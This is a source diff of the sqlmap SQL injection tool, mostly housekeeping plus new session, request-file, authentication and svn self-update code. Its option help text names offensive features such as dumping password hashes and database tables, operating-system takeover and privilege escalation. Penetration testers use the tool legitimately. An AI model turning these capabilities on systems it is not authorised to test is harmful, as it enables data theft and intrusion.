         dataToSessionFile("[%s][%s][%s][Injection type][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.injType))
 
-
 def setParenthesis(parenthesisCount):
     """
     @param parenthesisCount: number of parenthesis to be set into the
@@ -118,7 +111,6 @@ def setParenthesis(parenthesisCount):
 
     kb.parenthesis = parenthesisCount
 
-
 def setDbms(dbms):
     """
     @param dbms: database management system to be set into the knowledge
@@ -148,7 +140,6 @@ def setDbms(dbms):
 
     logger.info("the back-end DBMS is %s" % kb.dbms)
 
-
 def setOs():
     """
     Example of kb.bannerFp dictionary:
@@ -196,7 +187,6 @@ def setOs():
     if condition:
         dataToSessionFile("[%s][%s][%s][OS][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.os))
 
-
 def setStacked():
     condition = (
                   not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
@@ -209,7 +199,6 @@ def setStacked():
     if condition:
         dataToSessionFile("[%s][%s][%s][Stacked queries][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.stackedTest))
 
-
 def setUnion(comment=None, count=None, position=None):
     """
     @param comment: union comment to save in session file
@@ -249,7 +238,6 @@ def setUnion(comment=None, count=None, position=None):
 
         kb.unionPosition = position
 
-
 def setRemoteTempPath():
     condition = (
                   not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
@@ -259,7 +247,6 @@ def setRemoteTempPath():
     if condition:
         dataToSessionFile("[%s][%s][%s][Remote temp path][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], conf.tmpPath))
 
-
 def resumeConfKb(expression, url, value):
     if expression == "String" and url == conf.url:
         string = value[:-1]

lib/core/settings.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,16 +22,14 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import logging
 import subprocess
 import sys
 
-
 # sqlmap version and site
-VERSION            = "0.8-rc2"
+VERSION            = "0.8"
 VERSION_STRING     = "sqlmap/%s" % VERSION
+DESCRIPTION        = "automatic SQL injection and database takeover tool"
 SITE               = "http://sqlmap.sourceforge.net"
 
 # sqlmap logger
@@ -54,14 +52,10 @@ PYVERSION          = sys.version.split()[0]
 # Url to update Microsoft SQL Server XML versions file from
 MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
 
-# Urls to update sqlmap from
-SQLMAP_VERSION_URL = "%s/doc/VERSION" % SITE
-SQLMAP_SOURCE_URL  = "http://downloads.sourceforge.net/sqlmap/sqlmap-%s.zip"
-
 # Database managemen system specific variables
 MSSQL_SYSTEM_DBS   = ( "Northwind", "model", "msdb", "pubs", "tempdb" )
 MYSQL_SYSTEM_DBS   = ( "information_schema", "mysql" )                   # Before MySQL 5.0 only "mysql"
-PGSQL_SYSTEM_DBS   = ( "information_schema", "pg_catalog" )
+PGSQL_SYSTEM_DBS   = ( "information_schema", "pg_catalog", "pg_toast" )
 ORACLE_SYSTEM_DBS  = ( "SYSTEM", "SYSAUX" )                              # These are TABLESPACE_NAME
 
 MSSQL_ALIASES      = [ "microsoft sql server", "mssqlserver", "mssql", "ms" ]
@@ -77,6 +71,7 @@ SQL_STATEMENTS     = {
                              "select ",
                              "show ",
                              " top ",
+                             " distinct ",
                              " from ",
                              " from dual",
                              " where ",

lib/core/shell.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import atexit
 import os
 import rlcompleter
@@ -33,19 +31,16 @@ from lib.core.data import kb
 from lib.core.data import paths
 from lib.core.data import queries
 
-
 def saveHistory():
     historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
     readline.write_history_file(historyPath)
 
-
 def loadHistory():
     historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
 
     if os.path.exists(historyPath):
         readline.read_history_file(historyPath)
 
-
 def queriesForAutoCompletion():
     autoComplQueries = {}
 
@@ -61,7 +56,6 @@ def queriesForAutoCompletion():
 
     return autoComplQueries
 
-
 class CompleterNG(rlcompleter.Completer):
     def global_matches(self, text):
         """
@@ -80,7 +74,6 @@ class CompleterNG(rlcompleter.Completer):
 
         return matches
 
-
 def autoCompletion(sqlShell=False, osShell=False):
     # First of all we check if the readline is available, by default
     # it is not in Python default installation on Windows

lib/core/subprocessng.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import errno
 import os
 import sys
@@ -31,8 +29,7 @@ import time
 
 from lib.core.settings import IS_WIN
 
-
+if not IS_WIN:
-if IS_WIN is not True:
     import fcntl
 
     if (sys.hexversion >> 16) >= 0x202:
@@ -40,7 +37,6 @@ if IS_WIN is not True:
     else:
         import FCNTL
 
-
 def blockingReadFromFD(fd):
     # Quick twist around original Twisted function
     # Blocking read from a non-blocking file descriptor
@@ -64,7 +60,6 @@ def blockingReadFromFD(fd):
 
     return output
 
-
 def blockingWriteToFD(fd, data):
     # Another quick twist
     while True:
@@ -82,7 +77,6 @@ def blockingWriteToFD(fd, data):
 
         break
 
-
 def setNonBlocking(fd):
     """
     Make a file descriptor non-blocking

lib/core/target.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,15 +22,11 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import os
 import time
 
 from lib.core.common import dataToSessionFile
 from lib.core.common import paramToDict
-from lib.core.common import parseTargetUrl
-from lib.core.convert import urldecode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -41,7 +37,6 @@ from lib.core.exception import sqlmapGenericException
 from lib.core.exception import sqlmapSyntaxException
 from lib.core.session import resumeConfKb
 
-
 def __setRequestParams():
     """
     Check and set the parameters and perform checks on 'data' option for
@@ -65,21 +60,19 @@ def __setRequestParams():
         raise sqlmapSyntaxException, errMsg
 
     if conf.data:
-        urlDecodedData = urldecode(conf.data).replace("%", "%%")
+        conf.parameters["POST"] = conf.data
-        conf.parameters["POST"] = urlDecodedData
+        __paramDict = paramToDict("POST", conf.data)
-        __paramDict = paramToDict("POST", urlDecodedData)
 
         if __paramDict:
             conf.paramDict["POST"] = __paramDict
             __testableParameters = True
 
+        conf.method = "POST"
+
     # Perform checks on Cookie parameters
     if conf.cookie:
-        # TODO: sure about decoding the cookie?
+        conf.parameters["Cookie"] = conf.cookie
-        #urlDecodedCookie = urldecode(conf.cookie).replace("%", "%%")
+        __paramDict = paramToDict("Cookie", conf.cookie)
-        urlDecodedCookie = conf.cookie.replace("%", "%%")
-        conf.parameters["Cookie"] = urlDecodedCookie
-        __paramDict = paramToDict("Cookie", urlDecodedCookie)
 
         if __paramDict:
             conf.paramDict["Cookie"] = __paramDict
@@ -89,7 +82,8 @@ def __setRequestParams():
     if conf.httpHeaders:
         for httpHeader, headerValue in conf.httpHeaders:
             if httpHeader == "User-Agent":
-                conf.parameters["User-Agent"] = urldecode(headerValue).replace("%", "%%")
+                # No need for url encoding/decoding the user agent
+                conf.parameters["User-Agent"] = headerValue
 
                 condition  = not conf.testParameter
                 condition |= "User-Agent" in conf.testParameter
@@ -111,7 +105,6 @@ def __setRequestParams():
         errMsg += "within the GET, POST and Cookie parameters"
         raise sqlmapGenericException, errMsg
 
-
 def __setOutputResume():
     """
     Check and set the output text file and the resume functionality.
@@ -123,6 +116,7 @@ def __setOutputResume():
     logger.info("using '%s' as session file" % conf.sessionFile)
 
     if os.path.exists(conf.sessionFile):
+        if not conf.flushSession:
             readSessionFP = open(conf.sessionFile, "r")
             lines = readSessionFP.readlines()
     
@@ -159,6 +153,13 @@ def __setOutputResume():
                         kb.resumedQueries[url][expression] = value
     
             readSessionFP.close()
+        else:
+            try:
+                os.remove(conf.sessionFile)
+                logger.info("flushing session file")
+            except OSError, msg:
+                errMsg = "unable to flush the session file (%s)" % msg
+                raise sqlmapFilePathException, errMsg
 
     try:
         conf.sessionFP = open(conf.sessionFile, "a")
@@ -167,7 +168,6 @@ def __setOutputResume():
         errMsg = "unable to write on the session file specified"
         raise sqlmapFilePathException, errMsg
 
-
 def __createFilesDir():
     """
     Create the file directory.
@@ -181,7 +181,6 @@ def __createFilesDir():
     if not os.path.isdir(conf.filePath):
         os.makedirs(conf.filePath, 0755)
 
-
 def __createDumpDir():
     """
     Create the dump directory.
@@ -195,7 +194,6 @@ def __createDumpDir():
     if not os.path.isdir(conf.dumpPath):
         os.makedirs(conf.dumpPath, 0755)
 
-
 def createTargetDirs():
     """
     Create the output directory.
@@ -214,7 +212,6 @@ def createTargetDirs():
     __createDumpDir()
     __createFilesDir()
 
-
 def initTargetEnv():
     """
     Initialize target environment.
@@ -234,6 +231,5 @@ def initTargetEnv():
         kb.unionCount     = None
         kb.unionPosition  = None
 
-    parseTargetUrl()
     __setRequestParams()
     __setOutputResume()

lib/core/unescaper.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,19 +22,14 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 class Unescaper:
     def __init__(self):
         self.__unescaper = None
 
-
     def setUnescape(self, unescapeFunction):
         self.__unescaper = unescapeFunction
 
-
     def unescape(self, expression, quote=True):
         return self.__unescaper(expression, quote=quote)
 
-
 unescaper = Unescaper()

lib/core/update.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,20 +22,24 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import difflib
 import os
 import re
 import shutil
 import sys
 import tempfile
+import time
 import urlparse
 import zipfile
 
 from distutils.dir_util import mkpath
 from xml.dom.minidom import Document
 
+from subprocess import PIPE
+from subprocess import Popen as execute
+
+from lib.core.common import dataToStdout
+from lib.core.common import pollProcess
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import logger
@@ -43,12 +47,9 @@ from lib.core.data import paths
 from lib.core.exception import sqlmapConnectionException
 from lib.core.exception import sqlmapFilePathException
 from lib.core.settings import MSSQL_VERSIONS_URL
-from lib.core.settings import SQLMAP_VERSION_URL
-from lib.core.settings import SQLMAP_SOURCE_URL
 from lib.core.settings import VERSION
 from lib.request.connect import Connect as Request
 
-
 def __updateMSSQLXML():
     infoMsg = "updating Microsoft SQL Server XML versions file"
     logger.info(infoMsg)
@@ -199,141 +200,59 @@ def __updateMSSQLXML():
         infoMsg += "last update"
         logger.info(infoMsg)
 
-
-def __createFile(pathname, data):
-    mkpath(os.path.dirname(pathname))
-
-    fileFP = open(pathname, "wb")
-    fileFP.write(data)
-    fileFP.close()
-
-
-def __extractZipFile(tempDir, zipFile):
-    # Check if the saved binary file is really a ZIP file
-    if zipfile.is_zipfile(zipFile):
-        sqlmapZipFile = zipfile.ZipFile(zipFile)
-    else:
-        raise sqlmapFilePathException, "the downloaded file does not seem to be a ZIP file"
-
-    # Extract each file within the ZIP file in the temporary directory
-    for info in sqlmapZipFile.infolist():
-        if info.filename[-1] != '/':
-            data = sqlmapZipFile.read(info.filename)
-            __createFile(os.path.join(tempDir, info.filename), data)
-
-
 def __updateSqlmap():
-    infoMsg = "updating sqlmap"
+    rootDir = paths.SQLMAP_ROOT_PATH
-    logger.info(infoMsg)
 
-    debugMsg = "checking if a new version is available"
+    infoMsg = "updating sqlmap to latest development version from the "
-    logger.debug(debugMsg)
+    infoMsg += "subversion repository"
+    logger.info(infoMsg)
 
     try:
-        sqlmapNewestVersion, _ = Request.getPage(url=SQLMAP_VERSION_URL, direct=True)
+        import pysvn
-    except sqlmapConnectionException, _:
-        __sqlmapPath     = urlparse.urlsplit(SQLMAP_VERSION_URL)
-        __sqlmapHostname = __sqlmapPath[1]
 
-        warnMsg  = "sqlmap was unable to connect to %s" % __sqlmapHostname
+        debugMsg = "sqlmap will update itself using installed python-svn "
-        warnMsg += ", check your Internet connection and retry"
+        debugMsg += "third-party library, http://pysvn.tigris.org/"
-        logger.warn(warnMsg)
-
-        return
-
-    sqlmapNewestVersion = str(sqlmapNewestVersion).replace("\n", "")
-
-    if not re.search("^([\w\.\-]+)$", sqlmapNewestVersion):
-        errMsg = "sqlmap version is in a wrong syntax"
-        logger.error(errMsg)
-
-        return
-
-    if sqlmapNewestVersion == VERSION:
-        infoMsg = "you are already running sqlmap latest stable version"
-        logger.info(infoMsg)
-
-        return
-
-    elif sqlmapNewestVersion > VERSION:
-        infoMsg  = "sqlmap latest stable version is %s. " % sqlmapNewestVersion
-        infoMsg += "Going to download it from the SourceForge File List page"
-        logger.info(infoMsg)
-
-    elif sqlmapNewestVersion < VERSION:
-        infoMsg  = "you are running a version of sqlmap more updated than "
-        infoMsg += "the latest stable version (%s)" % sqlmapNewestVersion
-        logger.info(infoMsg)
-
-        return
-
-    sqlmapBinaryStringUrl = SQLMAP_SOURCE_URL % sqlmapNewestVersion
-
-    try:
-        sqlmapBinaryString, _ = Request.getPage(url=sqlmapBinaryStringUrl, direct=True)
-    except sqlmapConnectionException, _:
-        __sqlmapPath     = urlparse.urlsplit(sqlmapBinaryStringUrl)
-        __sqlmapHostname = __sqlmapPath[1]
-
-        warnMsg  = "sqlmap was unable to connect to %s" % __sqlmapHostname
-        warnMsg += ", check your Internet connection and retry"
-        logger.warn(warnMsg)
-
-        return
-
-    debugMsg  = 'saving the sqlmap compressed source to a ZIP file into '
-    debugMsg += 'the temporary directory and extract it'
         logger.debug(debugMsg)
 
-    tempDir = tempfile.gettempdir()
+        def notify(event_dict):
-    zipFile = os.path.join(tempDir, "sqlmap-%s.zip" % sqlmapNewestVersion)
+            action = str(event_dict['action'])
-    __createFile(zipFile, sqlmapBinaryString)
+            index = action.find('_')
-    __extractZipFile(tempDir, zipFile)
+            prefix = action[index + 1].upper() if index != -1 else action.capitalize()
 
-    # For each file and directory in the temporary directory copy it
+            if action.find('_update') != -1:
-    # to the sqlmap root path and set right permission
+                return
-    # TODO: remove files not needed anymore and all pyc within the
-    # sqlmap root path in the end
-    for root, _, files in os.walk(os.path.join(tempDir, "sqlmap-%s" % sqlmapNewestVersion)):
-        # Just for development release
-        if '.svn' in root:
-            continue
 
-        cleanRoot = root.replace(tempDir, "")
+            if action.find('_completed') == -1:
-        cleanRoot = cleanRoot.replace("%ssqlmap-%s" % (os.sep, sqlmapNewestVersion), "")
+                print "%s\t%s" % (prefix, event_dict['path'])
-
-        if cleanRoot.startswith(os.sep):
-            cleanRoot = cleanRoot[1:]
-
-        for f in files:
-            # Just for development release
-            if f.endswith(".pyc") or f.endswith(".pyo"):
-                continue
-
-            srcFile = os.path.join(root, f)
-            dstFile = os.path.join(paths.SQLMAP_ROOT_PATH, os.path.join(cleanRoot, f))
-
-            if f == "sqlmap.conf" and os.path.exists(dstFile):
-                infoMsg = "backupping configuration file to '%s.bak'" % dstFile
-                logger.info(infoMsg)
-                shutil.move(dstFile, "%s.bak" % dstFile)
-
-            if os.path.exists(dstFile):
-                debugMsg = "replacing file '%s'" % dstFile
             else:
-                debugMsg = "creating new file '%s'" % dstFile
+                revision = str(event_dict['revision'])
+                index = revision.find('number ')
 
+                if index != -1:
+                    revision = revision[index+7:].strip('>')
+
+                logger.info('updated to the latest revision %s' % revision)
+
+        client = pysvn.Client()
+        client.callback_notify = notify
+        client.update(rootDir)
+    except ImportError, _:
+        debugMsg = "sqlmap will try to update itself using 'svn' command"
         logger.debug(debugMsg)
 
-            mkpath(os.path.dirname(dstFile))
+        process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE, stderr=PIPE)
-            shutil.copy(srcFile, dstFile)
 
-            if f.endswith(".py"):
+        dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
-                os.chmod(dstFile, 0755)
+        pollProcess(process)
-
+        svnStdout, svnStderr = process.communicate()
-    infoMsg = "sqlmap updated successfully"
-    logger.info(infoMsg)
 
+        if svnStderr:
+            errMsg = svnStderr.strip()
+            logger.error(errMsg)
+        elif svnStdout:
+            revision = re.search("revision\s+([\d]+)", svnStdout, re.I)
+            if revision:
+                logger.info('updated to the latest revision %s' % revision.group(1))
 
 def update():
     if not conf.updateAll:

lib/parse/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/parse/banner.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import re
 
 from xml.sax import parse
@@ -35,7 +33,6 @@ from lib.core.data import kb
 from lib.core.data import paths
 from lib.parse.handler import FingerprintHandler
 
-
 class MSSQLBannerHandler(ContentHandler):
     """
     This class defines methods to parse and extract information from the
@@ -48,10 +45,10 @@ class MSSQLBannerHandler(ContentHandler):
         self.__inServicePack = False
         self.__release       = None
         self.__version       = ""
+        self.__versionAlt    = None
         self.__servicePack   = ""
         self.__info          = info
 
-
     def __feedInfo(self, key, value):
         value = sanitizeStr(value)
 
@@ -60,7 +57,6 @@ class MSSQLBannerHandler(ContentHandler):
 
         self.__info[key] = value
 
-
     def startElement(self, name, attrs):
         if name == "signatures":
             self.__release = sanitizeStr(attrs.get("release"))
@@ -71,34 +67,36 @@ class MSSQLBannerHandler(ContentHandler):
         elif name == "servicepack":
             self.__inServicePack = True
 
-
     def characters(self, data):
         if self.__inVersion:
             self.__version += sanitizeStr(data)
         elif self.__inServicePack:
             self.__servicePack += sanitizeStr(data)
 
-
     def endElement(self, name):
         if name == "signature":
-            if re.search(" %s[\.\ ]+" % self.__version, self.__banner):
+            for version in (self.__version, self.__versionAlt):
+                if version and re.search(" %s[\.\ ]+" % version, self.__banner):
                     self.__feedInfo("dbmsRelease", self.__release)
                     self.__feedInfo("dbmsVersion", self.__version)
                     self.__feedInfo("dbmsServicePack", self.__servicePack)
+                    break
 
             self.__version     = ""
+            self.__versionAlt  = None
             self.__servicePack = ""
 
-
         elif name == "version":
             self.__inVersion = False
             self.__version = self.__version.replace(" ", "")
             
+            match = re.search(r"\A(?P<major>\d+)\.00\.(?P<build>\d+)\Z", self.__version)
+            self.__versionAlt = "%s.0.%s.0" % (match.group('major'), match.group('build')) if match else None
+
         elif name == "servicepack":
             self.__inServicePack = False
             self.__servicePack = self.__servicePack.replace(" ", "")
 
-
 def bannerParser(banner):
     """
     This function calls a class to extract information from the given

lib/parse/cmdline.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import sys
 
 from optparse import OptionError
@@ -33,7 +31,6 @@ from optparse import OptionParser
 from lib.core.data import logger
 from lib.core.settings import VERSION_STRING
 
-
 def cmdLineParser():
     """
     This function parses the command line parameters and arguments
@@ -54,7 +51,10 @@ def cmdLineParser():
         target.add_option("-u", "--url", dest="url", help="Target url")
 
         target.add_option("-l", dest="list", help="Parse targets from Burp "
-                          "or WebScarab logs")
+                          "or WebScarab proxy logs")
+
+        target.add_option("-r", dest="requestFile",
+                          help="Load HTTP request from a file")
 
         target.add_option("-g", dest="googleDork",
                           help="Process Google dork results as target urls")
@@ -75,8 +75,13 @@ def cmdLineParser():
         request.add_option("--cookie", dest="cookie",
                            help="HTTP Cookie header")
 
-        request.add_option("--referer", dest="referer",
+        request.add_option("--cookie-urlencode", dest="cookieUrlencode",
-                           help="HTTP Referer header")
+                             action="store_true",
+                             help="URL Encode generated cookie injections")
+
+        request.add_option("--drop-set-cookie", dest="dropSetCookie",
+                           action="store_true",
+                           help="Ignore Set-Cookie header from response")
 
         request.add_option("--user-agent", dest="agent",
                            help="HTTP User-Agent header")
@@ -85,20 +90,31 @@ def cmdLineParser():
                            help="Load a random HTTP User-Agent "
                                 "header from file")
 
+        request.add_option("--referer", dest="referer",
+                           help="HTTP Referer header")
+
         request.add_option("--headers", dest="headers",
                            help="Extra HTTP headers newline separated")
 
         request.add_option("--auth-type", dest="aType",
-                           help="HTTP Authentication type (value "
+                           help="HTTP authentication type "
-                                "Basic, Digest or NTLM)")
+                                "(Basic, Digest or NTLM)")
 
         request.add_option("--auth-cred", dest="aCred",
-                           help="HTTP Authentication credentials (value "
+                           help="HTTP authentication credentials "
-                                "name:password)")
+                                "(name:password)")
+                                
+        request.add_option("--auth-cert", dest="aCert",
+                           help="HTTP authentication certificate ("
+                                "key_file,cert_file)")
 
         request.add_option("--proxy", dest="proxy",
                            help="Use a HTTP proxy to connect to the target url")
 
+        request.add_option("--ignore-proxy", dest="ignoreProxy",
+                            action="store_true",
+                           help="Ignore system default HTTP proxy")
+
         request.add_option("--threads", dest="threads", type="int", default=1,
                            help="Maximum number of concurrent HTTP "
                                 "requests (default 1)")
@@ -114,6 +130,9 @@ def cmdLineParser():
                            help="Retries when the connection timeouts "
                                 "(default 3)")
 
+        request.add_option("--scope", dest="scope", 
+                           help="Regexp to filter targets from provided proxy log")
+
         # Injection options
         injection = OptionGroup(parser, "Injection", "These options can be "
                                 "used to specify which parameters to test "
@@ -195,7 +214,6 @@ def cmdLineParser():
                                action="store_true",
                                help="Perform an extensive DBMS version fingerprint")
 
-
         # Enumeration options
         enumeration = OptionGroup(parser, "Enumeration", "These options can "
                                   "be used to enumerate the back-end database "
@@ -223,25 +241,23 @@ def cmdLineParser():
 
         enumeration.add_option("--passwords", dest="getPasswordHashes",
                                action="store_true",
-                               help="Enumerate DBMS users password hashes (opt -U)")
+                               help="Enumerate DBMS users password hashes")
 
         enumeration.add_option("--privileges", dest="getPrivileges",
                                action="store_true",
-                               help="Enumerate DBMS users privileges (opt -U)")
+                               help="Enumerate DBMS users privileges")
 
         enumeration.add_option("--dbs", dest="getDbs", action="store_true",
                                help="Enumerate DBMS databases")
 
         enumeration.add_option("--tables", dest="getTables", action="store_true",
-                               help="Enumerate DBMS database tables (opt -D)")
+                               help="Enumerate DBMS database tables")
 
         enumeration.add_option("--columns", dest="getColumns", action="store_true",
-                               help="Enumerate DBMS database table columns "
+                               help="Enumerate DBMS database table columns")
-                                    "(req -T opt -D)")
 
         enumeration.add_option("--dump", dest="dumpTable", action="store_true",
-                               help="Dump DBMS database table entries "
+                               help="Dump DBMS database table entries")
-                                    "(req -T, opt -D, -C)")
 
         enumeration.add_option("--dump-all", dest="dumpAll", action="store_true",
                                help="Dump all DBMS databases tables entries")
@@ -311,8 +327,8 @@ def cmdLineParser():
                                    "write to")
 
         # Takeover options
-        takeover = OptionGroup(parser, "Operating system access", "This "
+        takeover = OptionGroup(parser, "Operating system access", "These "
-                               "option can be used to access the back-end "
+                               "options can be used to access the back-end "
                                "database management system underlying "
                                "operating system.")
 
@@ -336,8 +352,7 @@ def cmdLineParser():
                                  "exploitation")
 
         takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
-                            help="User priv escalation by abusing Windows "
+                            help="Database process' user privilege escalation")
-                                 "access tokens")
 
         takeover.add_option("--msf-path", dest="msfPath",
                             help="Local path where Metasploit Framework 3 "
@@ -348,8 +363,8 @@ def cmdLineParser():
                                  "directory")
 
         # Windows registry options
-        windows = OptionGroup(parser, "Windows registry access", "This "
+        windows = OptionGroup(parser, "Windows registry access", "These "
-                               "option can be used to access the back-end "
+                               "options can be used to access the back-end "
                                "database management system Windows "
                                "registry.")
 
@@ -377,16 +392,22 @@ def cmdLineParser():
         # Miscellaneous options
         miscellaneous = OptionGroup(parser, "Miscellaneous")
 
+        miscellaneous.add_option("-s", dest="sessionFile",
+                                 help="Save and resume all data retrieved "
+                                      "on a session file")
+                                      
+        miscellaneous.add_option("--flush-session", dest="flushSession", action="store_true",
+                                 help="Flush session file for current target")
+                                      
         miscellaneous.add_option("--eta", dest="eta", action="store_true",
                                  help="Display for each output the "
                                       "estimated time of arrival")
 
-        miscellaneous.add_option("--update", dest="updateAll", action="store_true",
+        miscellaneous.add_option("--gpage", dest="googlePage", type="int",
-                                help="Update sqlmap to the latest stable version")
+                                 help="Use google dork results from specified page number")
 
-        miscellaneous.add_option("-s", dest="sessionFile",
+        miscellaneous.add_option("--update", dest="updateAll", action="store_true",
-                                 help="Save and resume all data retrieved "
+                                  help="Update sqlmap")
-                                      "on a session file")
 
         miscellaneous.add_option("--save", dest="saveCmdline", action="store_true",
                                  help="Save options on a configuration INI file")
@@ -412,8 +433,8 @@ def cmdLineParser():
 
         (args, _) = parser.parse_args()
 
-        if not args.url and not args.list and not args.googleDork and not args.configFile and not args.updateAll:
+        if not args.url and not args.list and not args.googleDork and not args.configFile and not args.requestFile and not args.updateAll:
-            errMsg  = "missing a mandatory parameter ('-u', '-l', '-g', '-c' or '--update'), "
+            errMsg  = "missing a mandatory parameter ('-u', '-l', '-r', '-g', '-c' or '--update'), "
             errMsg += "-h for help"
             parser.error(errMsg)
 

lib/parse/configfile.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from ConfigParser import NoSectionError
 from ConfigParser import ConfigParser
 
@@ -33,10 +31,8 @@ from lib.core.data import logger
 from lib.core.exception import sqlmapMissingMandatoryOptionException
 from lib.core.optiondict import optDict
 
-
 config = None
 
-
 def configFileProxy(section, option, boolean=False, integer=False):
     """
     Parse configuration file and save settings into the configuration
@@ -63,7 +59,6 @@ def configFileProxy(section, option, boolean=False, integer=False):
         debugMsg += "ignoring. Skipping to next."
         logger.debug(debugMsg)
 
-
 def configFileParser(configFile):
     """
     Parse configuration file and save settings into the configuration

lib/parse/handler.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
